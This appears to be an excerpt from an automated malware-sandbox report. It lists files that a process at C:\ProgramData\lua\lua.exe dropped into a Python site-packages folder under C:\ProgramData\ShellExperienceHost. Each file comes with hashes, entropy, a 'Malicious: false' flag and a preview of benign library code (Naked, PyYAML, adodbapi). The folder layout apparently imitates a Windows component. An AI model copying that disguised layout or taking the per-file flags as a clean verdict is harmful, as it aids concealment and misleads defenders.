SHA-512:	084029318667C5D0249F4BDED67A725B99A87423FAD51EDDB4E0934D7CEA6A2CC786E2D03B56ADED90003A41E31715DDC31FDBF1B21487BD0277C59B34CD0282
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8.# cython: profile=False..import sys.import os.from Naked.settings import debug as DEBUG_FLAG..#------------------------------------------------------------------------------.#.# FILE & DIRECTORY PATHS.#.#------------------------------------------------------------------------------..#------------------------------------------------------------------------------.# [ filename function ] (string).# returns file name from a file path (including the file extension).# Tests: test_SYSTEM.py :: test_sys_filename.#------------------------------------------------------------------------------.def filename(filepath):. try:. return os.path.basename(filepath). except Exception as e:. if DEBUG_FLAG:. sys.stderr.write("Naked Framework Error: unable to return base filename from filename() function (Naked.toolshed.system)."). raise e..#------------------------------------------------------------------------------.# [ file

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\types.c Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1240797
Entropy (8bit):	5.123945936941437
Encrypted:	false
SSDEEP:	6144:d1uUtuou/u3uRuyGuku9unubuCufu2uvVqsFuDuSu4uVI1uNLukuYu2uTuauZuZA:d+jfhgSKytfsk3sb8513qcSVdF8C1E
MD5:	2D2F5592FA6D4C0BA50F17DC0506BF5A
SHA1:	69AC49D96453FD2B0C7F0E0397B48C9F50EB5B41
SHA-256:	493BD1D0E13F3CB906AE8B35074BE37A90997610A51238DA08492ACAE64D30E7
SHA-512:	1123151CA444CD418FC77DE99B550ED8593D54FBE4342D79F65630DE443286979750EDBA7B207B401423848EB3FFD19E4A4C23B8D0DF83C06908A0855F30781F
Malicious:	false
Preview:	/* Generated by Cython 0.20.1 on Sun Mar 16 22:58:16 2014 /..#define PY_SSIZE_T_CLEAN.#ifndef CYTHON_USE_PYLONG_INTERNALS.#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 0.#else.#include "pyconfig.h".#ifdef PYLONG_BITS_IN_DIGIT.#define CYTHON_USE_PYLONG_INTERNALS 1.#else.#define CYTHON_USE_PYLONG_INTERNALS 0.#endif.#endif.#endif.#include "Python.h".#ifndef Py_PYTHON_H. #error Python headers needed to compile C extensions, please install development version of Python..#elif PY_VERSION_HEX < 0x02040000. #error Cython requires Python 2.4+..#else.#define CYTHON_ABI "0_20_1".#include <stddef.h> / For offsetof /.#ifndef offsetof.#define offsetof(type, member) ( (size_t) & ((type)0) -> member ).#endif.#if !defined(WIN32) && !defined(MS_WINDOWS). #ifndef __stdcall. #define __stdcall. #endif. #ifndef __cdecl. #define __cdecl. #endif. #ifndef __fastcall. #define __fastcall. #endif.#endif.#ifndef DL_IMPORT. #define DL_IMPORT(t) t.#endif.#ifndef DL_EXPORT.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\c\types.pyx Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	44721
Entropy (8bit):	4.058826170197892
Encrypted:	false
SSDEEP:	384:is746tyyfJsfJoEl2MaHXwC5IcLJu0J2uUJeBT6DKKDUO3wyCTdQmLW+nc8Qhhco:i2x9RsRtlBwTLo0HU04qJnOhh08
MD5:	015BD1E06BDFAF08BCD3480062081A8F
SHA1:	632FD45A1A5FF2C1EFD4B785C672FD5160F1EA6A
SHA-256:	7A9D0D911FCE15B9A9F7A29A031E66C4F618513B5CED5E8BD6A4A468B4BFA2AF
SHA-512:	967E299C14E3BD4FEA5AE9EFF2C19CE87CA68E2F0BE766785D4176FCAABB789B4B981F252F75E96DCB53E7F68161E70E4538389D2F17EF5CC9A707D157B77F35
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8.# cython: profile=False..import sys.from Naked.settings import debug as DEBUG_FLAG..#------------------------------------------------------------------------------.# [[ NakedObject class ]].# A generic Python object.# Assigns object attributes by key name in the dictionary argument to the constructor.# The methods are inherited by other mutable Naked object extension types.# Attribute accessors: hasattr, getattr, setattr, delattr.#------------------------------------------------------------------------------.class NakedObject(object):. # initialize with an attributes dictionary {attribute_name: attribute_value}. def __init__(self, attributes={}, naked_type='NakedObject'):. if len(attributes) > 0:. for key in attributes:. setattr(self, key, attributes[key]). setattr(self, '_naked_type_', naked_type) # maintain an attribute to keep track of the extension type.. #------------------------------

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\casts.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5126
Entropy (8bit):	4.334569608303342
Encrypted:	false
SSDEEP:	96:8Loa/tNfyuGLLGOJZ/pOn2d2ZgBDUxORT12BDvytRzZhX:ioaVN6uGXGOz2jgFL12FUnhX
MD5:	FED5CB81F39FACCE712206BC837452D7
SHA1:	283626BBAA75D067DF9CC8E9524DF0226B1FB650
SHA-256:	7A568D969D2105127F6C53D35FEE1E601F748263EB6D53F3FFA4D8E0716B6DCF
SHA-512:	FF161436E4D6FDC2B1FD6E1D094FAD2FF01F560D438018E01C284EBAEA48B7CA7CBF7AB4B9FDFD5A821F3C1BE0EEDACD0538ACED095F06D3696202119D8AC3E5
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8.# tests in test_CASTS.py..from Naked.toolshed.types import NakedObject, XFSet, XDict, XList, XQueue, XSet, XString, XTuple.from Naked.settings import debug as DEBUG_FLAG..#------------------------------------------------------------------------------.# [ nobj ] (NakedObject).# Cast a dictionary of attributes to a NakedObject with key>attribute mapping.#------------------------------------------------------------------------------.def nobj(attributes={}):. try:. return NakedObject(attributes). except Exception as e:. if DEBUG_FLAG:. print("Naked Framework Error: unable to create a NakedObject with the requested argument using the nobj() function (Naked.toolshed.casts.py)."). raise e..#------------------------------------------------------------------------------.# [ xd function ] (XDict).# Cast a Python dictionary to a XDict.#------------------------------------------------------------------------------.def

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\file.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	19941
Entropy (8bit):	4.299730452278875
Encrypted:	false
SSDEEP:	192:DOSFvnSlqKoWFD1fg8OQzdk4sHzVO8r1uWFHOa1iCYhulbUkc/X:DOivSYAH3244T5N68C
MD5:	9FBC7BE8877B16EC64A9F07B8202E0CC
SHA1:	F738BBA41FDF3CDBC4D9C76774134703D58B5DED
SHA-256:	167621A150A09D3614F968DE7422C9160B1DF5492F6EF24DB7927E7ED58C2F71
SHA-512:	D396FFDC25194C1CB86063B198EFE1DED15B7388F1B943ACDEF2ACB7B83F09C88B2C07F8B4453889A4ED25CE52AB2B477686003DE23295FB91C7F847D14CC29F
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import sys.from Naked.settings import debug as DEBUG_FLAG..#------------------------------------------------------------------------------.# [ IO class ].# interface for all local file IO classes.#------------------------------------------------------------------------------.class IO:. def __init__(self,filepath):. self.filepath = filepath..#------------------------------------------------------------------------------.# [ FileWriter class ].# writes data to local files.#------------------------------------------------------------------------------.class FileWriter(IO):. def __init__(self, filepath):. IO.__init__(self, filepath).. #------------------------------------------------------------------------------. # [ append method ]. # Universal text file writer that appends to existing file using system default text encoding or utf-8 if throws unicode error. # Tests: test_IO.py:: test_file_ascii_readwrite_appe

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\git.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	79
Entropy (8bit):	4.486795939742496
Encrypted:	false
SSDEEP:	3:TKQWaHMPAtgDKCtQlq3UDFRLhAj5EMC9/on:HWaHUclqkDFAjajK
MD5:	004FF3658F8824368A1FCDDD164B9C28
SHA1:	4EED4A950B2047E828729B8940E0D92D9D4A9186
SHA-256:	5805FFB27B8E1695482013D1B08657BDADB8C0AEBB30404D644E5E493E1F4838
SHA-512:	8DC17D8DF9CBBA5D5BEFE2BAD1BBB6394675E94DC4042545ADC3FC5BE02376E382B17942DF03B3B995BA6ADCFE4908AA6FEF3BC2531EB63F0370ACE25471262C
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8....if __name__ == '__main__':. pass.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\ink.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5436
Entropy (8bit):	4.361346937854681
Encrypted:	false
SSDEEP:	96:8q1IrepFdlbKM3EivWIWEiElqUls9SLmzKM50ku:R8M3vvWIY3507
MD5:	923A85BD0ED7DC45847F8A2F0CDAA837
SHA1:	68B16B6ECB407E89BFA11B8B9AAC34D50B2629FF
SHA-256:	F62FD92698295ED2EA0ECDF63851A87A2354EC08E8EF1C0A988F4574209C32DF
SHA-512:	1CB573D08D84A46B27C75472E60E1B7E4975B8DDE2F478604E1A7435D8C87ED85774779D6C50A3251B42190CCEA78344AC44ED4839401C450495AEBFBDFF0BD9
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..#------------------------------------------------------------------------------.# The Ink Templating System.# A lightweight, fast, flexible text templating system.# Copyright 2014 Christopher Simpkins.# MIT License.#------------------------------------------------------------------------------.import re..#------------------------------------------------------------------------------.# Template class.# A template string class that is inherited from Python str.# Includes metadata about the template:.# odel = opening delimiter.# cdel = closing delimiter.# varlist = inclusive list of all variables in the template text (parsed in constructor).# Delimiters:.# default = {{variable}}.# assign new opening and closing delimiters as parameters when you make a new Template instance.# `escape_regex` boolean is a speedup, avoids Python escape of special regex chars if you do not need it.#------------------------------------------------

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\iter.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	500
Entropy (8bit):	3.989902289060466
Encrypted:	false
SSDEEP:	12:HccZYGoT/XxnvH7YM2ipSsaFWpy1gg2aG:8cSGojBUd51gtaG
MD5:	876FCDE0C3936ECA59DF8D21D515A0A8
SHA1:	CA9BFCD1F321B0C4FF409B544AC41249FCF3DB9B
SHA-256:	C946A51FFB725D8B44AAC143BB2DA7E597EEB2C5E6745BA7CE00385BB61DCFD3
SHA-512:	09B738D9DE4D800B03DE5236004F3A92E05D0C91AE49A46D5722EAF3D2D350042C98E6326F7B2DE86EE472857EB2043E31CD826966DEF373C57222922FCA6164
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import itertools..#------------------------------------------------------------------------------.# [ chain_iter method ] (iterable items of type contained in multiple list arguments).# Generator that returns iterable for each item in the multiple list arguments in sequence.#------------------------------------------------------------------------------.def chain_iter(self, lists):. return itertools.chain(lists)..if __name__ == '__main__':. pass.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\network.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	19525
Entropy (8bit):	4.33227575811265
Encrypted:	false
SSDEEP:	192:DJ/GqPqvvWvH9pBE3O4cLtb3o4E/T16vMxv2Mvr8Bj4BoGaLtssQiT2sBGxhO:DpFSmVpa33c93o4gwKbABUBoGbsusBn
MD5:	9CB6C4844F0E589BA7304AD5F9CD4319
SHA1:	00E00BEF1DF9F1C7C8C465280F2FE26656E8EA66
SHA-256:	5694D29BA5D0CB63E6FFE6ADB2ACADE6F77D64C9D816B26C7C984FC19D91FA3B
SHA-512:	A522EB3EE7D0006F1132C5472B7C508A92F504F397C45BCE247EF6EB92EAEC5657B1C390BAF62033DA29917459BC6D89E0C86E65DBB6A05414D1FA7840E2E085
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import sys.import requests.from Naked.settings import debug as DEBUG_FLAG..#------------------------------------------------------------------------------.#[ HTTP class].# handle HTTP requests.# Uses the requests external library to handle HTTP requests and response object (available on PyPI).#------------------------------------------------------------------------------.class HTTP():. def __init__(self, url="", request_timeout=10):. self.url = url. self.request_timeout = request_timeout. #------------------------------------------------------------------------------. # HTTP response properties (assignment occurs with the HTTP request methods). #------------------------------------------------------------------------------. self.res = None # assigned with the requests external library response object after a HTTP method call.. #---------------------------------------------------------------------

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\python.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2158
Entropy (8bit):	3.327499124293463
Encrypted:	false
SSDEEP:	24:8ciypWyma9wpwQKPJKFJgpwsUYKZ+pwPhnRhYKqFRvpw2J1BXdpwJ/C1BlwmaT:8NydmatQUKF1OKZBPDiKq7WAXdeOCmaT
MD5:	29AC43C7F66BD0E42D321277A56A6550
SHA1:	E4DD7F7CBE5E8F5CE95164DAADE00B248FFD1E86
SHA-256:	958F8D6FC9F2980A48C88E29589347B2DD75540F0827280117AD804A78E0F589
SHA-512:	36FCD145252FD81AA29CD880A8764859426B422A0DBFB0F119999DD890DDD53E3E198B6E6600ED464DF93B31DA023C82724983FA98601E5490EE76243E88FF79
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8.# tests: test_PYTHON.py..from sys import version_info..#------------------------------------------------------------------------------.# Python Versions.#------------------------------------------------------------------------------..#------------------------------------------------------------------------------.# [ py_version function ] (tuple of (major, minor, patch)).#------------------------------------------------------------------------------.def py_version():..return (version_info[0], version_info[1], version_info[2])..#------------------------------------------------------------------------------.# [ py_major_version function ] (integer).# Return Python interpreter major version number.#------------------------------------------------------------------------------.def py_major_version():..return (version_info[0])..#------------------------------------------------------------------------------.# [ py_minor_version function ] (integer).#

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\shell.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12605
Entropy (8bit):	4.36322286153584
Encrypted:	false
SSDEEP:	192:imWeDFtGhocSh5XeveiWUFGUPS4U49t/q/lom9odaidolQi+lzmA1z2e5Tz:iFeDHG+ccONCSbS/lokoXolelzHnz
MD5:	B8EB55849748C5BC28474611DA0F7AA8
SHA1:	4D2A26868E1E630143D3F5317133085FD90623BC
SHA-256:	F2101DCD2D794D3CE87C7AF699108BA5FED38533620D5A2E423588D7C2D208D8
SHA-512:	1D37DB453D2993D9D8D960DABFDC46E938F2E18F24E0A09507B7425A8EA2889FE09CDF82A85CF88B951A3C183C4B6793487993609D557AAE4D8A328CCE5CFE6D
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import os.import sys.import subprocess.from Naked.settings import debug as DEBUG_FLAG..#------------------------------------------------------------------------------.# [ execute function ] (boolean).# run a shell command and print std out / std err to terminal.# returns True if exit status = 0.# returns False if exit status != 0.#------------------------------------------------------------------------------.def execute(command):. try:. response = subprocess.call(command, shell=True). if response == 0:. return True. else:. return False. except subprocess.CalledProcessError as cpe:. try:. sys.stderr.write(cpe.output). except TypeError as te:. sys.stderr.write(str(cpe.output)). except Exception as e:. if DEBUG_FLAG:. sys.stderr.write("Naked Framework Error: unable to run the shell command with the execute() function (Naked.toolshed.shell.py

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\state.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1061
Entropy (8bit):	4.875255915735517
Encrypted:	false
SSDEEP:	24:8cqRQl58fAlQo/k3Xs+3CqoMAGXcmRJPf5kxUm2w8+vl+vnKWaT:8dml58fLo/+Xs8zAGXcoJPf5xm2EyaT
MD5:	21745E3D60AE9A346611A87472AAC8CA
SHA1:	27C2A2EF98805B2D56F033F867E0814EAAA2C1B3
SHA-256:	FCF9C3318E55C2CF495CDE95768425356C21675130A22C140EEFAA8E5FCD9A4E
SHA-512:	EC4AA7C830A4DB7281F4AC780ED16AB6267148A2328B2AF567E5D1C0D81DBD9501B37D8E5098623467771BF038F29CCAC9391DDC9E4F4734449A522753F689BD
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..from Naked.settings import debug as DEBUG_FLAG.from Naked.toolshed.system import cwd.import Naked.toolshed.python as py.import sys.import os.import datetime..class StateObject:..def __init__(self):...now = datetime.datetime.now()...self.py2 = py.is_py2() #truth test Python 2 interpreter...self.py3 = py.is_py3() #truth test Python 3 interpreter...self.py_major = py.py_major_version() #Python major version...self.py_minor = py.py_minor_version() #Python minor version...self.py_patch = py.py_patch_version() #Python patch version...self.os = sys.platform #user operating system...self.cwd = cwd() #current (present) working directory...self.parent_dir = os.pardir...self.default_path = os.defpath...self.user_path = os.path.expanduser("~")...self.string_encoding = sys.getdefaultencoding()...self.file_encoding = sys.getfilesystemencoding()...self.hour = now.hour...self.min = now.minute...self.year = now.year...self.day = now.day...self.month = now.month.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\system.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	24660
Entropy (8bit):	4.224064457552497
Encrypted:	false
SSDEEP:	384:DB+gHg0+g6u0NZCEhZv+BlbXlgVo/RmiCS:DnA0+g6uyXhZmBlbXMiN
MD5:	F8AC7E3CF82AFF75A26ABFBAA4D7A0B8
SHA1:	6797DEC5C87F01F418E4A575D67B395684A2933F
SHA-256:	21E261A2882587129B2A21B9358C3AFF27BC31E44A3526399CECF505909904D9
SHA-512:	9AB1A5A9A7ECF5F543AA3B105FD2353676E94959B46508F3C60DC08F5346D7CB8464C87722E0955916EBF0F5CE9D5DE9409B3A5D5C65069E1C7C043247D7F117
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import sys.import os.from Naked.settings import debug as DEBUG_FLAG..#------------------------------------------------------------------------------.#.# FILE & DIRECTORY PATHS.#.#------------------------------------------------------------------------------..#------------------------------------------------------------------------------.# [ filename function ] (string).# returns file name from a file path (including the file extension).# Tests: test_SYSTEM.py :: test_sys_filename.#------------------------------------------------------------------------------.def filename(filepath):. try:. return os.path.basename(filepath). except Exception as e:. if DEBUG_FLAG:. sys.stderr.write("Naked Framework Error: unable to return base filename from filename() function (Naked.toolshed.system)."). raise e..#------------------------------------------------------------------------------.# [ file_extension function ] (s

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Naked\toolshed\types.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	44532
Entropy (8bit):	4.055083195219851
Encrypted:	false
SSDEEP:	384:Ds746tyyfJsfJoEl2MaHXwC5IcLJu0J2uUJeBT6DKK7U5wyCTdQmLW+nc8Qhhcb8:D2x9RsRtlBwTLo0HU04nJnOhh08
MD5:	B5A92CD76D737C565A90866C6AE0CFF9
SHA1:	3CFC0EE3CC31CA646CDF0B7B36E98F729164D833
SHA-256:	C5DFC1BBF7CABB415B50B0F812FC10FCE05858CB81563E6BE29131E169BBAE20
SHA-512:	2170FBD5FF421F641AE73E35E96C906C471E867D6C752F836ADBBD5DBE5E8E6A6193B012E25B45CB255ED8BC0AE9DC5B9B354CC5EB4BDF4F4F4500852301AE43
Malicious:	false
Preview:	#!/usr/bin/env python.# encoding: utf-8..import sys.from Naked.settings import debug as DEBUG_FLAG..#------------------------------------------------------------------------------.# [[ NakedObject class ]].# A generic Python object.# Assigns object attributes by key name in the dictionary argument to the constructor.# The methods are inherited by other mutable Naked object extension types.# Attribute accessors: hasattr, getattr, setattr, delattr.#------------------------------------------------------------------------------.class NakedObject(object):. # initialize with an attributes dictionary {attribute_name: attribute_value}. def __init__(self, attributes={}, naked_type='NakedObject'):. if len(attributes) > 0:. for key in attributes:. setattr(self, key, attributes[key]). setattr(self, '_naked_type_', naked_type) # maintain an attribute to keep track of the extension type.. #------------------------------------------------------

C:\ProgramData\ShellExperienceHost\Lib\site-packages\PyYAML-5.3.1.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\PyYAML-5.3.1.dist-info\LICENSE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1101
Entropy (8bit):	5.169421405185982
Encrypted:	false
SSDEEP:	24:aNrOJH7H0yxgtUHw1hC09QHOsUv4eOk4/+/m3oqLFh:8SJrlxEvdQHOs5exm3ogFh
MD5:	7BBD28CAA69F81F5CD5F48647236663D
SHA1:	E99E74D048726C39136DC992F1FB5998972E3B4E
SHA-256:	C40112449F254B9753045925248313E9270EFA36D226B22D82D4CC6C43C57F29
SHA-512:	AF9828C79E26E3D270FBB5E802B9DB2366D25D38C05F14DB052DCEF44214BA29F62FD87BDB30B8973C6389FE0ACB91A238EA920685B2F0395E2F969838E4CA43
Malicious:	false
Preview:	Copyright (c) 2017-2020 Ingy d.t Net.Copyright (c) 2006-2016 Kirill Simonov..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies.of the Software, and to permit persons to whom the Software is furnished to do.so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, A

C:\ProgramData\ShellExperienceHost\Lib\site-packages\PyYAML-5.3.1.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1690
Entropy (8bit):	4.8153552387970615
Encrypted:	false
SSDEEP:	48:DR9P43SQIgjaaxLiPkxsxy13k0NbV6Q/myvi:DR9wiQIgjaaxmPkxsxy13V1V6mmy6
MD5:	5E5567B6793953D3708F6E88BFF73591
SHA1:	0A5FA7C648ADF47DEEBFE218CFAFAD930842D107
SHA-256:	24C1C623065385294D7261B15D3559F8D14D2B72A210705D7EBC8915F3C6ED89
SHA-512:	B9334A83C10BEEFDAC5B9C16CBEDCD4C37B4E831607C3045BF2FA62ABD92635ADDBA78CFF93C401B260AE711415F7E4EE6073F029A5FAE46ED04C1509CE0A5E7
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: PyYAML.Version: 5.3.1.Summary: YAML parser and emitter for Python.Home-page: https://github.com/yaml/pyyaml.Author: Kirill Simonov.Author-email: xi@resolvent.net.License: MIT.Download-URL: https://pypi.org/project/PyYAML/.Platform: Any.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Cython.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.7.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.5.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :

C:\ProgramData\ShellExperienceHost\Lib\site-packages\PyYAML-5.3.1.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4101
Entropy (8bit):	5.7986075228303084
Encrypted:	false
SSDEEP:	96:kXA1OKqcRjy85fG4woMg69+uPBb+DlMs94cT6e6LVkSAiCdErqPie+z53VQG8adB:kXA1OQfhwfuq8wKBmhv
MD5:	C373A32B46650862C70F6C2AE8ED943B
SHA1:	0359474742A27CFCB290ED457AAA90BBBD8193C9
SHA-256:	32DD6D26384542ABF55F743CE48BED88A7ADE83A156FE79C29D7BD691331E1D3
SHA-512:	0AA4E345DED5DBE5FD204251C8A9888EB5FDEA6373F5661762F599DC4C6D3AA33676F68180E00F5CD1188D0DA53E53D8BDDA257ECB2155C5F0775A27F1A6FC0B
Malicious:	false
Preview:	PyYAML-5.3.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..PyYAML-5.3.1.dist-info/LICENSE,sha256=xAESRJ8lS5dTBFklJIMT6ScO-jbSJrItgtTMbEPFfyk,1101..PyYAML-5.3.1.dist-info/METADATA,sha256=JMHGIwZThSlNcmGxXTVZ-NFNK3KiEHBdfryJFfPG7Yk,1690..PyYAML-5.3.1.dist-info/RECORD,,..PyYAML-5.3.1.dist-info/WHEEL,sha256=W7gQNdCXaaCQL4_mS6kf-ClnoFRCfSnJ5Gcl1436agg,102.._yaml.cp37-win32.pyd,sha256=KEWNCuXRKjCsq-yrMPM_CAY1egErbvKlVlErGBimHVI,231424..yaml/__init__.py,sha256=XFUNbKTg4afAd0BETjGQ1mKQ97_g5jbE1C0WoKc74dc,13170..yaml/__pycache__/__init__.cpython-37.pyc,,..yaml/__pycache__/__init__.cpython-37.pyc,sha256=9mlMJ9tOMjw3NCTZDIbmaDm2agMAVuwVdoDlJFuS8XE,11723..yaml/__pycache__/composer.cpython-37.pyc,,..yaml/__pycache__/composer.cpython-37.pyc,sha256=vnr3dHCKUhY1b5TAV9RNU9Q9bBlJESiGW-Ua2lt767c,3484..yaml/__pycache__/constructor.cpython-37.pyc,,..yaml/__pycache__/constructor.cpython-37.pyc,sha256=1uv5yXxahyI9QlLSJo-l1gM93KeL8cTsjsmM6s5zIXc,21210..yaml/__pycache__/cyaml.cpytho

C:\ProgramData\ShellExperienceHost\Lib\site-packages\PyYAML-5.3.1.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	102
Entropy (8bit):	5.045097529036378
Encrypted:	false
SSDEEP:	3:RtED7MWcSlVitcoSKjP+tkSrLcyn:RtEMwlViWo5jWKSrLcyn
MD5:	30AAE992778A401E7620859D6456422C
SHA1:	751928BE6E407C0BC63911C47822C1E88AF0F442
SHA-256:	5BB81035D09769A0902F8FE64BA91FF82967A054427D29C9E46725D78DFA6A08
SHA-512:	C59AF34CB4D9921E9E188EFD7E88D4F69E86F3EB8394ACA3E33A89279DAFE6CFB2C6258B0DE746AFB4E355C8D32A29E05CC4E7F7107186F7222C17EFCA7558D3
Malicious:	false
Preview:	Wheel-Version: 1.0..Generator: bdist_wheel (0.34.2)..Root-Is-Purelib: false..Tag: cp37-cp37m-win32....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2097
Entropy (8bit):	4.819004732198873
Encrypted:	false
SSDEEP:	48:axtohGsrHAKNPcd+WN6jrdXjzUJqJSHzUJqJ7+2z5YqJ2R:CtohGsrHAKuV8jBHcqJicqJn5YqJ+
MD5:	B20A830A82F6F8DF8F57FD5EC837F2AD
SHA1:	2590761DFBE32D8225EC7C460D947647E25DBABB
SHA-256:	DE8937B154BA0D050A40E574D5F7B55B3CD80DD22C3866EE7484BF3EB398F421
SHA-512:	7E65CA75D9B27B3340D95682C3563A06C3AD3E981381C416D0B140FA389E87E284045E03B99C75E0C750A763B06C630C19BD0D2D18B1FEC9920F5DA2016656B8
Malicious:	false
Preview:	"""adodbapi - A python DB API 2.0 (PEP 249) interface to Microsoft ADO..Copyright (C) 2002 Henrik Ekelund, version 2.1 by Vernon Cole.* http://sourceforge.net/projects/adodbapi.""".import sys.import time..from .apibase import apilevel, threadsafety, paramstyle.from .apibase import Warning, Error, InterfaceError, DatabaseError, DataError, OperationalError, IntegrityError.from .apibase import InternalError, ProgrammingError, NotSupportedError, FetchFailedError.from .apibase import NUMBER, STRING, BINARY, DATETIME, ROWID..from .adodbapi import connect, Connection, __version__, dateconverter, Cursor..def Binary(aString):. """This function constructs an object capable of holding a binary (long) string value. """. return bytes(aString)..def Date(year,month,day):. "This function constructs an object holding a date value. ". return dateconverter.Date(year,month,day)..def Time(hour,minute,second):. "This function constructs an object holding a time value. ". return dateconvert

C:\ProgramData\ShellExperienceHost\Lib\site-packages\adodbapi\ado_consts.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10615
Entropy (8bit):	4.8560236077729035
Encrypted:	false
SSDEEP:	192:ihyx4kaEkr8Co4rYLEAo9ihcXfNAqGlXpAxkPS:Is5BQMpA6S
MD5:	97FB4474CEF9DCFACD24AD7A8B66CE1F
SHA1:	710977BD4BF3D6B246CB1C98D792BA4214F54F47
SHA-256:	CE3520EE60137104F5C67AD6548D7B3DE58ED0B9B10055050E816631D3B2C265
SHA-512:	939E5A32EC4A70A388EA818AB7BB3525C9B05C0E99F5868F91A9F11BF1A0CD39CADEB2814265B58758074BC7FA14505C0FC393A3EA295D8CAD7D4E3349459823
Malicious:	false
